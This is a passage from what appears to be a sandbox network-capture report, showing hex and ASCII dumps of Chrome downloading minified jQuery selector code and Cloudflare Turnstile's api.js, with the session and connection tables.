                                                                              2024-12-11 14:19:40 UTC1378INData Raw: 6f 6e 28 65 29 7b 76 61 72 20 74 2c 6e 3b 72 65 74 75 72 6e 21 28 21 65 7c 7c 22 5b 6f 62 6a 65 63 74 20 4f 62 6a 65 63 74 5d 22 21 3d 3d 6f 2e 63 61 6c 6c 28 65 29 29 26 26 28 21 28 74 3d 72 28 65 29 29 7c 7c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 28 6e 3d 76 2e 63 61 6c 6c 28 74 2c 22 63 6f 6e 73 74 72 75 63 74 6f 72 22 29 26 26 74 2e 63 6f 6e 73 74 72 75 63 74 6f 72 29 26 26 61 2e 63 61 6c 6c 28 6e 29 3d 3d 3d 6c 29 7d 2c 69 73 45 6d 70 74 79 4f 62 6a 65 63 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3b 66 6f 72 28 74 20 69 6e 20 65 29 72 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 21 30 7d 2c 67 6c 6f 62 61 6c 45 76 61 6c 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 62 28 65 2c 7b 6e 6f 6e 63 65 3a 74 26 26 74 2e 6e 6f
                                                                              Data Ascii: on(e){var t,n;return!(!e||"[object Object]"!==o.call(e))&&(!(t=r(e))||"function"==typeof(n=v.call(t,"constructor")&&t.constructor)&&a.call(n)===l)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e,t,n){b(e,{nonce:t&&t.no
                                                                              2024-12-11 14:19:40 UTC1378INData Raw: 5d 2c 71 3d 74 2e 70 6f 70 2c 4c 3d 74 2e 70 75 73 68 2c 48 3d 74 2e 70 75 73 68 2c 4f 3d 74 2e 73 6c 69 63 65 2c 50 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 2c 72 3d 65 2e 6c 65 6e 67 74 68 3b 6e 3c 72 3b 6e 2b 2b 29 69 66 28 65 5b 6e 5d 3d 3d 3d 74 29 72 65 74 75 72 6e 20 6e 3b 72 65 74 75 72 6e 2d 31 7d 2c 52 3d 22 63 68 65 63 6b 65 64 7c 73 65 6c 65 63 74 65 64 7c 61 73 79 6e 63 7c 61 75 74 6f 66 6f 63 75 73 7c 61 75 74 6f 70 6c 61 79 7c 63 6f 6e 74 72 6f 6c 73 7c 64 65 66 65 72 7c 64 69 73 61 62 6c 65 64 7c 68 69 64 64 65 6e 7c 69 73 6d 61 70 7c 6c 6f 6f 70 7c 6d 75 6c 74 69 70 6c 65 7c 6f 70 65 6e 7c 72 65 61 64 6f 6e 6c 79 7c 72 65 71 75 69 72 65 64 7c 73 63 6f 70 65 64 22 2c 4d 3d 22 5b 5c 5c 78 32 30 5c 5c 74
                                                                              Data Ascii: ],q=t.pop,L=t.push,H=t.push,O=t.slice,P=function(e,t){for(var n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},R="checked|selected|async|autofocus|autoplay|controls|defer|disabled|hidden|ismap|loop|multiple|open|readonly|required|scoped",M="[\\x20\\t
                                                                              2024-12-11 14:19:40 UTC1378INData Raw: 2c 65 65 3d 2f 5b 2b 7e 5d 2f 2c 74 65 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5c 5c 5c 5c 5b 5c 5c 64 61 2d 66 41 2d 46 5d 7b 31 2c 36 7d 22 2b 4d 2b 22 3f 7c 5c 5c 5c 5c 28 5b 5e 5c 5c 72 5c 5c 6e 5c 5c 66 5d 29 22 2c 22 67 22 29 2c 6e 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 22 30 78 22 2b 65 2e 73 6c 69 63 65 28 31 29 2d 36 35 35 33 36 3b 72 65 74 75 72 6e 20 74 7c 7c 28 6e 3c 30 3f 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 2b 36 35 35 33 36 29 3a 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 3e 3e 31 30 7c 35 35 32 39 36 2c 31 30 32 33 26 6e 7c 35 36 33 32 30 29 29 7d 2c 72 65 3d 2f 28 5b 5c 30 2d 5c 78 31 66 5c 78 37 66 5d 7c 5e 2d 3f 5c 64 29 7c 5e 2d 24 7c 5b 5e 5c 30 2d 5c 78 31 66 5c
                                                                              Data Ascii: ,ee=/[+~]/,te=new RegExp("\\\\[\\da-fA-F]{1,6}"+M+"?|\\\\([^\\r\\n\\f])","g"),ne=function(e,t){var n="0x"+e.slice(1)-65536;return t||(n<0?String.fromCharCode(n+65536):String.fromCharCode(n>>10|55296,1023&n|56320))},re=/([\0-\x1f\x7f]|^-?\d)|^-$|[^\0-\x1f\
                                                                              2024-12-11 14:19:40 UTC1378INData Raw: 29 29 7b 28 66 3d 65 65 2e 74 65 73 74 28 74 29 26 26 79 65 28 65 2e 70 61 72 65 6e 74 4e 6f 64 65 29 7c 7c 65 29 3d 3d 3d 65 26 26 64 2e 73 63 6f 70 65 7c 7c 28 28 73 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 29 3f 73 3d 73 2e 72 65 70 6c 61 63 65 28 72 65 2c 69 65 29 3a 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 2c 73 3d 53 29 29 2c 6f 3d 28 6c 3d 68 28 74 29 29 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 6f 2d 2d 29 6c 5b 6f 5d 3d 28 73 3f 22 23 22 2b 73 3a 22 3a 73 63 6f 70 65 22 29 2b 22 20 22 2b 78 65 28 6c 5b 6f 5d 29 3b 63 3d 6c 2e 6a 6f 69 6e 28 22 2c 22 29 7d 74 72 79 7b 72 65 74 75 72 6e 20 48 2e 61 70 70 6c 79 28 6e 2c 66 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 63 29 29 2c 6e 7d 63 61 74 63 68 28
                                                                              Data Ascii: )){(f=ee.test(t)&&ye(e.parentNode)||e)===e&&d.scope||((s=e.getAttribute("id"))?s=s.replace(re,ie):e.setAttribute("id",s=S)),o=(l=h(t)).length;while(o--)l[o]=(s?"#"+s:":scope")+" "+xe(l[o]);c=l.join(",")}try{return H.apply(n,f.querySelectorAll(c)),n}catch(
                                                                              2024-12-11 14:19:40 UTC1378INData Raw: 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 61 28 5b 5d 2c 65 2e 6c 65 6e 67 74 68 2c 6f 29 2c 69 3d 72 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 69 2d 2d 29 65 5b 6e 3d 72 5b 69 5d 5d 26 26 28 65 5b 6e 5d 3d 21 28 74 5b 6e 5d 3d 65 5b 6e 5d 29 29 7d 29 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 79 65 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 26 26 65 7d 66 6f 72 28 65 20 69 6e 20 64 3d 73 65 2e 73 75 70 70 6f 72 74 3d 7b 7d 2c 69 3d 73 65 2e 69 73 58 4d 4c 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 26 26 65 2e 6e 61 6d 65 73 70 61 63 65 55 52 49 2c 6e 3d 65 26 26 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c
                                                                              Data Ascii: ion(e,t){var n,r=a([],e.length,o),i=r.length;while(i--)e[n=r[i]]&&(e[n]=!(t[n]=e[n]))})})}function ye(e){return e&&"undefined"!=typeof e.getElementsByTagName&&e}for(e in d=se.support={},i=se.isXML=function(e){var t=e&&e.namespaceURI,n=e&&(e.ownerDocument|
                                                                              2024-12-11 14:19:40 UTC1378INData Raw: 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 65 2e 72 65 70 6c 61 63 65 28 74 65 2c 6e 65 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 26 26 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 28 22 69 64 22 29 3b 72 65 74 75 72 6e 20 74 26 26 74 2e 76 61 6c 75 65 3d 3d 3d 6e 7d 7d 2c 62 2e 66 69 6e 64 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 26 26 45 29 7b 76 61 72 20 6e 2c 72 2c 69 2c 6f 3d 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 65 29 3b 69 66 28 6f 29 7b 69 66 28 28
                                                                              Data Ascii: tion(e){var n=e.replace(te,ne);return function(e){var t="undefined"!=typeof e.getAttributeNode&&e.getAttributeNode("id");return t&&t.value===n}},b.find.ID=function(e,t){if("undefined"!=typeof t.getElementById&&E){var n,r,i,o=t.getElementById(e);if(o){if((
                                                                              2024-12-11 14:19:40 UTC1378INData Raw: 5b 22 2b 4d 2b 22 2a 6e 61 6d 65 22 2b 4d 2b 22 2a 3d 22 2b 4d 2b 22 2a 28 3f 3a 27 27 7c 5c 22 5c 22 29 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 63 68 65 63 6b 65 64 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 3a 63 68 65 63 6b 65 64 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 61 23 22 2b 53 2b 22 2b 2a 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 2e 23 2e 2b 5b 2b 7e 5d 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5c 5c 5c 66 22 29 2c 76 2e 70 75 73 68 28 22 5b 5c 5c 72 5c 5c 6e 5c 5c 66 5d 22 29 7d 29 2c 63 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 3c 61 20 68 72 65 66 3d 27 27 20 64 69 73 61 62 6c 65 64 3d 27
                                                                              Data Ascii: ["+M+"*name"+M+"*="+M+"*(?:''|\"\")"),e.querySelectorAll(":checked").length||v.push(":checked"),e.querySelectorAll("a#"+S+"+*").length||v.push(".#.+[+~]"),e.querySelectorAll("\\\f"),v.push("[\\r\\n\\f]")}),ce(function(e){e.innerHTML="<a href='' disabled='
                                                                              2024-12-11 14:19:40 UTC1378INData Raw: 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 2d 21 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 3b 72 65 74 75 72 6e 20 6e 7c 7c 28 31 26 28 6e 3d 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 65 29 3d 3d 28 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 74 29 3f 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 74 29 3a 31 29 7c 7c 21 64 2e 73 6f 72 74 44 65 74 61 63 68 65 64 26 26 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 65 29 3d 3d 3d 6e 3f 65 3d 3d 43 7c 7c 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70 26 26 79 28 70 2c 65 29 3f 2d 31 3a 74 3d 3d 43 7c 7c 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70
                                                                              Data Ascii: e.compareDocumentPosition-!t.compareDocumentPosition;return n||(1&(n=(e.ownerDocument||e)==(t.ownerDocument||t)?e.compareDocumentPosition(t):1)||!d.sortDetached&&t.compareDocumentPosition(e)===n?e==C||e.ownerDocument==p&&y(p,e)?-1:t==C||t.ownerDocument==p


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              6192.168.2.1649716104.18.94.414436636C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-12-11 14:19:41 UTC647OUTGET /turnstile/v0/g/f9063374b04d/api.js HTTP/1.1
                                                                              Host: challenges.cloudflare.com
                                                                              Connection: keep-alive
                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                              sec-ch-ua-mobile: ?0
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                              sec-ch-ua-platform: "Windows"
                                                                              Accept: */*
                                                                              Sec-Fetch-Site: cross-site
                                                                              Sec-Fetch-Mode: no-cors
                                                                              Sec-Fetch-Dest: script
                                                                              Referer: https://fht.lidociou.com/
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2024-12-11 14:19:41 UTC471INHTTP/1.1 200 OK
                                                                              Date: Wed, 11 Dec 2024 14:19:41 GMT
                                                                              Content-Type: application/javascript; charset=UTF-8
                                                                              Content-Length: 47692
                                                                              Connection: close
                                                                              accept-ranges: bytes
                                                                              last-modified: Tue, 03 Dec 2024 18:31:41 GMT
                                                                              cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                                                              access-control-allow-origin: *
                                                                              cross-origin-resource-policy: cross-origin
                                                                              Server: cloudflare
                                                                              CF-RAY: 8f061c72484cc330-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              2024-12-11 14:19:41 UTC898INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 48 74 28 65 2c 72 2c 6e 2c 6f 2c 63 2c 75 2c 67 29 7b 74 72 79 7b 76 61 72 20 68 3d 65 5b 75 5d 28 67 29 2c 6c 3d 68 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 70 29 7b 6e 28 70 29 3b 72 65 74 75 72 6e 7d 68 2e 64 6f 6e 65 3f 72 28 6c 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 6c 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 42 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 6e 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 75 3d 65 2e 61 70 70 6c 79 28 72 2c 6e 29 3b 66 75 6e 63 74
                                                                              Data Ascii: "use strict";(function(){function Ht(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);funct
                                                                              2024-12-11 14:19:41 UTC1369INData Raw: 20 65 7d 66 75 6e 63 74 69 6f 6e 20 53 72 28 65 2c 72 29 7b 76 61 72 20 6e 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 72 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 6e 2e 70 75 73 68 2e 61 70 70 6c 79 28 6e 2c 6f 29 7d 72 65 74 75 72 6e 20 6e 7d 66 75 6e 63 74 69 6f 6e 20 6e 74 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 72 3d 72 21 3d 6e 75
                                                                              Data Ascii: e}function Sr(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),n.push.apply(n,o)}return n}function nt(e,r){return r=r!=nu
                                                                              2024-12-11 14:19:41 UTC1369INData Raw: 72 61 79 24 2f 2e 74 65 73 74 28 6e 29 29 72 65 74 75 72 6e 20 61 74 28 65 2c 72 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 41 65 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 6a 74 28 65 29 7c 7c 71 74 28 65 2c 72 29 7c 7c 47 74 28 65 2c 72 29 7c 7c 7a 74 28 29 7d 66 75 6e 63 74 69 6f 6e 20 46 28 65 29 7b 22 40 73 77 63 2f 68 65 6c 70 65 72 73 20 2d 20 74 79 70 65 6f 66 22 3b 72 65 74 75 72 6e 20 65 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 55 65 28 65 2c 72 29 7b 76 61 72 20 6e 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 75 5b 30
                                                                              Data Ascii: ray$/.test(n))return at(e,r)}}function Ae(e,r){return jt(e)||qt(e,r)||Gt(e,r)||zt()}function F(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Ue(e,r){var n={label:0,sent:function(){if(u[0
                                                                              2024-12-11 14:19:41 UTC1369INData Raw: 74 69 6f 6e 3a 22 54 75 72 6e 73 74 69 6c 65 27 73 20 61 70 69 2e 6a 73 20 77 61 73 20 6c 6f 61 64 65 64 2c 20 62 75 74 20 74 68 65 20 69 66 72 61 6d 65 20 75 6e 64 65 72 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 6c 6f 61 64 65 64 2e 20 48 61 73 20 74 68 65 20 76 69 73 69 74 6f 72 20 62 6c 6f 63 6b 65 64 20 73 6f 6d 65 20 70 61 72 74 73 20 6f 66 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 6f 72 20 61 72 65 20 74 68 65 79 20 73 65 6c 66 2d 68 6f 73 74 69 6e 67 20 61 70 69 2e 6a 73 3f 22 7d 3b 76 61 72 20 59 74 3d 33 30 30 30 32 30 3b 76 61 72 20 44 65 3d 33 30 30 30 33 30 3b 76 61 72 20 56 65 3d 33 30 30 30 33 31 3b 76 61 72 20 6a 3b 28 66 75
                                                                              Data Ascii: tion:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Yt=300020;var De=300030;var Ve=300031;var j;(fu
                                                                              2024-12-11 14:19:41 UTC1369INData Raw: 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 4a 7c 7c 28 4a 3d 7b 7d 29 29 3b 76 61 72 20 69 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 4e 45 56 45 52 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 69 65 7c 7c 28 69 65 3d 7b 7d 29 29 3b 76 61 72 20 58 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 4c 57 41 59 53 3d 22 61 6c 77 61 79 73 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 2c 65 2e 49 4e 54 45 52 41 43 54 49 4f 4e 5f 4f 4e 4c 59 3d 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 7d 29 28 58 7c 7c 28 58 3d 7b 7d 29 29 3b 76 61 72 20 70 65 3b 28 66 75
                                                                              Data Ascii: ="never",e.MANUAL="manual",e.AUTO="auto"})(J||(J={}));var ie;(function(e){e.NEVER="never",e.MANUAL="manual",e.AUTO="auto"})(ie||(ie={}));var X;(function(e){e.ALWAYS="always",e.EXECUTE="execute",e.INTERACTION_ONLY="interaction-only"})(X||(X={}));var pe;(fu
                                                                              2024-12-11 14:19:41 UTC1369INData Raw: 65 3d 3d 3d 22 61 75 74 6f 22 7c 7c 4e 72 2e 74 65 73 74 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 67 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 61 6c 77 61 79 73 22 2c 22 65 78 65 63 75 74 65 22 2c 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 51 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 74 72 75 65 22 2c 22 66 61 6c 73 65 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 79 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 72 65 6e 64 65 72 22 2c 22 65 78 65 63 75 74 65 22 5d 2c 65 29 7d 76 61 72 20 24 74 3d 33 30 30 2c 4a 74 3d 31 30 3b 66 75 6e 63 74 69 6f 6e 20 68 74 28 65 29 7b 76 61 72 20 72 3d 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 3b 69 66 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65
                                                                              Data Ascii: e==="auto"||Nr.test(e)}function gt(e){return M(["always","execute","interaction-only"],e)}function Qt(e){return M(["true","false"],e)}function yt(e){return M(["render","execute"],e)}var $t=300,Jt=10;function ht(e){var r=new URLSearchParams;if(e.params._de
                                                                              2024-12-11 14:19:41 UTC1369INData Raw: 2f 72 63 76 22 29 2e 63 6f 6e 63 61 74 28 6f 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 72 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 6e 2e 74 68 65 6d 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 45 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 6e 2e 73 69 7a 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 6e 2e 6c 61 6e 67 75 61 67 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 70 29 7d 76 61 72 20 52 74 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 72 2c 6e 2c 6f 3d 77 69 6e 64 6f 77 2e 69 6e 6e 65 72 57 69 64 74 68 3c 34 30 30 2c 63 3d 65 2e 73 74 61 74 65 3d 3d 3d 53 65 2e 46 41 49 4c 55 52 45 5f 46 45 45 44 42 41 43 4b 7c 7c 65 2e 73 74 61 74 65 3d 3d 3d 53 65 2e 46 41 49 4c 55 52 45 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53
                                                                              Data Ascii: /rcv").concat(o,"/").concat(e,"/").concat(r,"/").concat(n.theme,"/").concat(E,"/").concat(n.size,"/").concat(n.language,"/").concat(p)}var Rt=function(e){var r,n,o=window.innerWidth<400,c=e.state===Se.FAILURE_FEEDBACK||e.state===Se.FAILURE_HAVING_TROUBLES
                                                                              2024-12-11 14:19:41 UTC1369INData Raw: 7c 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 2e 73 68 61 6d 29 72 65 74 75 72 6e 21 31 3b 69 66 28 74 79 70 65 6f 66 20 50 72 6f 78 79 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 29 72 65 74 75 72 6e 21 30 3b 74 72 79 7b 72 65 74 75 72 6e 20 42 6f 6f 6c 65 61 6e 2e 70 72 6f 74 6f 74 79 70 65 2e 76 61 6c 75 65 4f 66 2e 63 61 6c 6c 28 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 28 42 6f 6f 6c 65 61 6e 2c 5b 5d 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 29 29 2c 21 30 7d 63 61 74 63 68 28 65 29 7b 72 65 74 75 72 6e 21 31 7d 7d 66 75 6e 63 74 69 6f 6e 20 49 65 28 65 2c 72 2c 6e 29 7b 72 65 74 75 72 6e 20 6a 65 28 29 3f 49 65 3d 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 3a 49 65 3d 66 75 6e 63 74 69 6f 6e 28 63 2c 75 2c 67 29 7b 76 61 72 20 68 3d
                                                                              Data Ascii: |Reflect.construct.sham)return!1;if(typeof Proxy=="function")return!0;try{return Boolean.prototype.valueOf.call(Reflect.construct(Boolean,[],function(){})),!0}catch(e){return!1}}function Ie(e,r,n){return je()?Ie=Reflect.construct:Ie=function(c,u,g){var h=
                                                                              2024-12-11 14:19:41 UTC1369INData Raw: 29 3b 76 61 72 20 75 3b 72 65 74 75 72 6e 20 75 3d 72 2e 63 61 6c 6c 28 74 68 69 73 2c 6f 29 2c 4d 65 28 42 65 28 75 29 2c 22 63 6f 64 65 22 2c 76 6f 69 64 20 30 29 2c 75 2e 6e 61 6d 65 3d 22 54 75 72 6e 73 74 69 6c 65 45 72 72 6f 72 22 2c 75 2e 63 6f 64 65 3d 63 2c 75 7d 72 65 74 75 72 6e 20 6e 7d 28 71 65 28 45 72 72 6f 72 29 29 3b 66 75 6e 63 74 69 6f 6e 20 6d 28 65 2c 72 29 7b 76 61 72 20 6e 3d 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 2c 22 2e 22 29 3b 74 68 72 6f 77 20 6e 65 77 20 64 72 28 6e 2c 72 29 7d 66 75 6e 63 74 69 6f 6e 20 62 28 65 29 7b 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 29 29
                                                                              Data Ascii: );var u;return u=r.call(this,o),Me(Be(u),"code",void 0),u.name="TurnstileError",u.code=c,u}return n}(qe(Error));function m(e,r){var n="[Cloudflare Turnstile] ".concat(e,".");throw new dr(n,r)}function b(e){console.warn("[Cloudflare Turnstile] ".concat(e))
                                                                              2024-12-11 14:19:42 UTC1369INData Raw: 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 6c 2e 73 74 79 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 22 66 69 78 65 64 22 2c 6c 2e 73 74 79 6c 65 2e 7a 49 6e 64 65 78 3d 22 32 31 34 37 34 38 33 36 34 36 22 2c 6c 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 31 30 30 76 77 22 2c 6c 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 31 30 30 76 68 22 2c 6c 2e 73 74 79 6c 65 2e 74 6f 70 3d 22 30 22 2c 6c 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 22 30 22 2c 6c 2e 73 74 79 6c 65 2e 74 72 61 6e 73 66 6f 72 6d 4f 72 69 67 69 6e 3d 22 63 65 6e 74 65 72 20 63 65 6e 74 65 72 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 58 3d 22 68 69 64 64 65 6e 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 59 3d 22 61 75 74 6f 22 2c 6c 2e 73 74 79 6c 65
                                                                              Data Ascii: ent.createElement("div");l.style.position="fixed",l.style.zIndex="2147483646",l.style.width="100vw",l.style.height="100vh",l.style.top="0",l.style.left="0",l.style.transformOrigin="center center",l.style.overflowX="hidden",l.style.overflowY="auto",l.style


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              7192.168.2.1649719151.101.2.1374436636C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
